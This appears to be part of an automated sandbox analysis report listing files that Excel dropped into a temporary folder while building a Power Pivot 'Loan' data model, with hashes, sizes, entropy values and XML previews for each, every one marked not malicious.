                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Model.6.cub\Loan.44.det.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (7790), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):7790
                                                                                                Entropy (8bit):5.179577246960089
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0Bh0ZqCRwy9u/KUdxrM+80QMTD5suNkrkrQhrfrBybz7WAT:xIU1y9iV8a2S7Wu
                                                                                                MD5:08EEB0007A0C68A8BBC97349E5EDC10A
                                                                                                SHA1:8D6DFB71A1B212856742D0CB719B27CB1C662075
                                                                                                SHA-256:6D88801E34FDED3B0C0A2413A22B0B6174573E108B2E40B17C440F74BC5F7B17
                                                                                                SHA-512:2CCC3981C9F6DA93891F00CB747D50CFA9297D5BAD2A627747394B6B3C707290ADA248A25F492FCA1C833C2D25BDA8E2981F0D6B772B016739CDEA2134FCF018
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Model.6.cub\Loan.45.det.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (7774), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):7774
                                                                                                Entropy (8bit):5.1769776259475995
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0Bh0Oq/Rwy9u/KUdxrM+80QMTD5suNkrkrQhrfrBybzJVA7:xIf2y9iV8a2SJVy
                                                                                                MD5:E3A1B74852315571DE171E8615EDCA9C
                                                                                                SHA1:5C7FA75DBE1180149770A8B8A739DB32DD3B74A3
                                                                                                SHA-256:3BB337391CFB5E41155E8C7574F998B7DDEDD83920C40029763A3EAF8B603755
                                                                                                SHA-512:DB95D6D7CF070EF29DA5D6C28F81260819B203996A5099DE7AC81D61964A287ABA9CDC33EDECDA09593A7E26C618C39CCB63E8DC639820BAE69C0ABDA5D9185E
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Model.6.cub\Loan.5.det\Loan.26.prt.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (3105), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3105
                                                                                                Entropy (8bit):5.204148886618404
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8c/aeasRAw48UpWypzhJGJdAJQAJw/nJj/nJcREB4:07vexwKUYp0i4nq+0BhefAjp+bDuuQ
                                                                                                MD5:3DAEC54805161712053124711730D94A
                                                                                                SHA1:976E2AE8E18C73F89876BB309FCD171E88DA9282
                                                                                                SHA-256:DEDD8BE8F085D34833EEE140DF3EBE22B9F56D3908D7AA246220AB8C317851E7
                                                                                                SHA-512:EC906A20DE4BF5EF9B1D59760A7C9F9AA8EAA57D5811140BA630316A0983EF1586F3CB4585500C6E87EE5B4FA22425122A80405D00BF94DDCEDFBEA8A387328B
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Model.6.cub\Loan.5.det\Loan.27.prt.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (3105), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3105
                                                                                                Entropy (8bit):5.204374780483095
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8c/aeaSgkAwA8UpWypzhJGJdAJQAJw/nJj/nJcREP:07vexwKUYp0i4nq+0BhenArp+bDuuR
                                                                                                MD5:9821EBDAF46322F5C00F41CE2F240B43
                                                                                                SHA1:965463D4BC767111001B2B6783314E46FFC36C67
                                                                                                SHA-256:AC364946DCA4BC1BF33A8DEBCE6D943FE327679279BB2B01D0BEEDBDC2434487
                                                                                                SHA-512:2E7804B076EF6CE423D42DEE362A0201BA2EA9F12D23E2684A258EB23DF8401E68D60208D3F6C6A011B5C523E111B4CF71681CA0EEE0FF1345FA59C40ADBBF81
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Model.6.cub\Loan.5.det\Loan.5.prt\info.27.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (405), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):405
                                                                                                Entropy (8bit):4.993288092656503
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:C4+DnFro8i9xTIaAGTrPQkQDQf1gwP7k9FD9FwJ:C4+Bo8SEaAGXZF7AA
                                                                                                MD5:54778A29140087496FEA63AC1756540D
                                                                                                SHA1:0306B380AB1A308B40D580695F2C6A164A1FCE5F
                                                                                                SHA-256:94B31BE59B3F92FCABC04BBC4CD874B2782550722FD43FFBC8D30F3304BFAD0D
                                                                                                SHA-512:1498F757A4D8AD357F3F140CCADC2877093531639444E5291DD7CFD930FC29D38BC391203BCEEF3B383B4503362176ABF9DF4F1E8F9860A22C744C49A114F57A
                                                                                                Malicious:false
                                                                                                Preview:<Partition xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><DataVersion>27</DataVersion><RigidAggVersion>-1</RigidAggVersion><FlexAggVersion>-1</FlexAggVersion><DataIndexVersion>-1</DataIndexVersion><RigidIndexVersion>-1</RigidIndexVersion><FlexIndexVersion>-1</FlexIndexVersion></Partition>

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Model.6.cub\MdxScript.10.scr.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (2467), with CRLF, LF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):15807
                                                                                                Entropy (8bit):5.092832409479335
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xIaClC0YCndOYCnpuYCnF/yanb6anbfanbqanbEanp:0/b3bobnbFp
                                                                                                MD5:6293BAB42B59FF91399A4457C4B015E7
                                                                                                SHA1:3308DC506B8D2A8B25FCB5D23C38DE10C06708FE
                                                                                                SHA-256:264546598DA669877DB19BFE7D065324AF70A5C04A7F2F8019594659B903CE0F
                                                                                                SHA-512:762872E81929C79D6E3B9DFA426B7E79DC13D8027C47F7E63A399348B73D8184593AF9B7E4A48170A977E5EE2582D0FA7AF3D1070DFD7D04078BC6A75676831A
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Model.6.cub\info.29.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):169
                                                                                                Entropy (8bit):4.934836367190815
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:5WqDmNGzE+tRnJMgTTntViJS4RKbumd0jViJS4RKbuviyiKb:57mUA+DnJH3ic4sroVic4subiKb
                                                                                                MD5:0206F0CCEAE1CF9D86B29F4222B99C0F
                                                                                                SHA1:D7C8F3C8FF1FA346CE58849D9847468E0DC3CCCB
                                                                                                SHA-256:486A513B97BD07EC88CA576FE4C4D6BB03CDD356C0E09E67902F87852236A14B
                                                                                                SHA-512:E50DEDBCDBE7D9023D868B9B17ADAE9E44E72DF85B61B1591702063D32961BF4C78F683237838BB706904C8F1ED311EDDF9BA528400A2D7B211F617ACD7C8691
                                                                                                Malicious:false
                                                                                                Preview:<Cube xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/>

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\Administrators.0.role.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1732), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1732
                                                                                                Entropy (8bit):5.075270600647734
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:O4+sX+c+nH+oz+J+Kd+B+bi+bx+itj+nj+HH+9+++KWJo8pjNekTBDbZLV43+:07vexwKUYbVboitqnq+0Bhu8pjNe6LSO
                                                                                                MD5:02D0D040684EB8B4D88FDCA8312570DC
                                                                                                SHA1:6793028A19DD97DD161D37CA6E340733DE8F2829
                                                                                                SHA-256:0452BF4D8C88CB27647FFE6CCEE0CE8BFAF522C7D38FD79104D052165A4C02FF
                                                                                                SHA-512:752B5F86EFA22C60B5B99EE1B454F223EEBA78F080FAAB36A17B3923CBFC4136F732521747CF486DC1F6BE6464189ABF861CA3E998C9FB00E800895AE246FD79
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\CryptKey.bin

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:OpenPGP Public Key
                                                                                                Category:dropped
                                                                                                Size (bytes):144
                                                                                                Entropy (8bit):5.372639459024134
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:AFeZQNshkh/nHl9+lqlSRat+L0SFaqrWA+brOb1KtlAFeZQNshkn:AzsyQlqo8A0gRarOb1Kt6zsyn
                                                                                                MD5:053D880651437F6B35E80A77C66C9EA9
                                                                                                SHA1:8E6292835372B18B90037BFB4F21F8A7736A4F30
                                                                                                SHA-256:7D730DD73E3436A22AC9840D0122296824E0D31BA9F83944848DFC9A9C365554
                                                                                                SHA-512:1B83A5982D5EFD5E1040E1D88EB9C9747FD19FCF2EC5416A84430F3C3DBCE5DB02BDD28F609E1F0193AFE89C24DA82BF0CE208068D9B143D0587964D3991789B
                                                                                                Malicious:false
                                                                                                Preview:..!]-..N...8..DA....0...P............................f......s&..7.ak.........n7.R....+Lz...y-=..~|2.].aW.............>...........!]-..N...8..DA

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\EXCELXLINTERNAL.0.asm.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1861)
                                                                                                Category:dropped
                                                                                                Size (bytes):1939
                                                                                                Entropy (8bit):5.19481501151026
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8vDewsRdZud5:07vexwKUYp0i4nq+0Bhf
                                                                                                MD5:BB14F6A0B68589F20411850527895FD0
                                                                                                SHA1:E8DA03319AC770A24347944D9A71568B22B2AA8B
                                                                                                SHA-256:ED5D2FB6E23C7D8D5774DA76EB17B87CF8C5A33F6188F5A5E61658395B3ACAE6
                                                                                                SHA-512:BDD77F3AE53718D89A16255DC989E8BF9E60AAD626DC70EEBA433682D9F9BDEC887B60D5DF534B001BFD03526AE10D3CF70CAFE52E3B66D979BB911F04243EBD
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\ExcelMDX.0.asm.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1847)
                                                                                                Category:dropped
                                                                                                Size (bytes):1925
                                                                                                Entropy (8bit):5.167832577879531
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8vZewqpdZ845:07vexwKUYp0i4nq+0Bho3
                                                                                                MD5:4301CB7D63DB3BCF0244A0A2683F50C3
                                                                                                SHA1:790A9F39D3929E413F0C254671D803E0D149C66B
                                                                                                SHA-256:9D39F8A45A779100EDF7C14D1FDC36BD262B7F84072F49ED90A5432077688F36
                                                                                                SHA-512:587F3AC80AC77145CC9727A3029E7DCF9CE9B74482EC6CD4CF320773ECE497ADB043D8DB415A6D459962788953509D1CC1D7B7102570B9276C155D0D02B41161
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\VBAMDX.0.asm.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1843)
                                                                                                Category:dropped
                                                                                                Size (bytes):1921
                                                                                                Entropy (8bit):5.1748015810288575
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8vhewRadZz5:07vexwKUYp0i4nq+0Bhfo
                                                                                                MD5:594D31388C618729B29DC36C67FA2896
                                                                                                SHA1:A98AD55BFCB59175D672E1562BF045E465FD692D
                                                                                                SHA-256:C25E49283ABF56F17D5E4AC821033B707AE20FC86B97A37B8B5E46CFA28BA0F3
                                                                                                SHA-512:9F822AD38A6EFF66E0067E502818D811D33ED713D945666BEA0E84B89D8F31C618DAC691FEC2AEC22D28A7E03FBAC7877FFFF4AD26031B56D14DFE6709AC5FF6
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\VBAMDXINTERNAL.0.asm.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1859)
                                                                                                Category:dropped
                                                                                                Size (bytes):1937
                                                                                                Entropy (8bit):5.202979437179745
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8vXewNdZM45:07vexwKUYp0i4nq+0Bhik
                                                                                                MD5:E1DA2FAA42E19F036B8AF4F9FDB86F82
                                                                                                SHA1:928B5F99D714B00F941544851A7ED226E9225051
                                                                                                SHA-256:B112A89E4D3AD33EE8E53F87E084075416F854EBA96789B087C8B04A1697691A
                                                                                                SHA-512:DE9A21338A6A5AE9A2410B980BB7F7D27EEE8ACB254BD92845ED44E428C92F01B5FE2A5AE959470AFC1E6223B17CE6DE170EA69E2CF27EC5CFB9CA3FD501C1A1
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\master.vmp (copy)

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1889), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1889
                                                                                                Entropy (8bit):5.156181774517006
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RdLVNmyWogeFRsol8M4HZQbe4Jun4iDcRBj1:R52e589QT1
                                                                                                MD5:3C9AE8D8AC0E16EC6822A6933FB52285
                                                                                                SHA1:D75F53DEC129379F5B784B722E7053DBF7B855ED
                                                                                                SHA-256:8B73DFFE278B6FBA9EE96ED6AE2F42205D22FFE56CE702BCF9440A0AED703169
                                                                                                SHA-512:29ED37E704CEDDF689D105EBA293E54D728BF578CAE687E28FCBECD09C99C061AA276AE4368F561467CE4522E43F9BBA921E47233F944843A90B5F5C78B61FD4
                                                                                                Malicious:false
                                                                                                Preview:<VersionMap><VersionMapEntry><ObjectId>13FC1E21-492E-4404-B67D-92E57C6DE3DF</ObjectId><Version>0</Version><ObjectLastUpdated>133806202379335143</ObjectLastUpdated></VersionMapEntry><VersionMapEntry><ObjectId>9DECF935-22EC-4458-AC01-CEE0750D4C59</ObjectId><Version>0</Version><ObjectLastUpdated>133806202379491438</ObjectLastUpdated></VersionMapEntry><VersionMapEntry><ObjectId>A81D5357-1D02-46F4-B84E-8B3153787909</ObjectId><Version>0</Version><ObjectLastUpdated>133806202379491438</ObjectLastUpdated></VersionMapEntry><VersionMapEntry><ObjectId>E2081125-158E-4663-86C2-00FA9FF646C6</ObjectId><Version>45</Version><ObjectLastUpdated>133806202425585212</ObjectLastUpdated></VersionMapEntry><VersionMapEntry><ObjectId>1885DBF2-DB3A-4ADF-93E7-48484DEF85CC</ObjectId><Version>29</Version><ObjectLastUpdated>133806202409022627</ObjectLastUpdated></VersionMapEntry><VersionMapEntry><ObjectId>C7D90621-A153-4A7F-85FE-52305A56EF9E</ObjectId><Version>10</Version><ObjectLastUpdated>133806202409022627</ObjectL

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\txn.vmp

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1889), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1889
                                                                                                Entropy (8bit):5.156181774517006
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RdLVNmyWogeFRsol8M4HZQbe4Jun4iDcRBj1:R52e589QT1
                                                                                                MD5:3C9AE8D8AC0E16EC6822A6933FB52285
                                                                                                SHA1:D75F53DEC129379F5B784B722E7053DBF7B855ED
                                                                                                SHA-256:8B73DFFE278B6FBA9EE96ED6AE2F42205D22FFE56CE702BCF9440A0AED703169
                                                                                                SHA-512:29ED37E704CEDDF689D105EBA293E54D728BF578CAE687E28FCBECD09C99C061AA276AE4368F561467CE4522E43F9BBA921E47233F944843A90B5F5C78B61FD4
                                                                                                Malicious:false
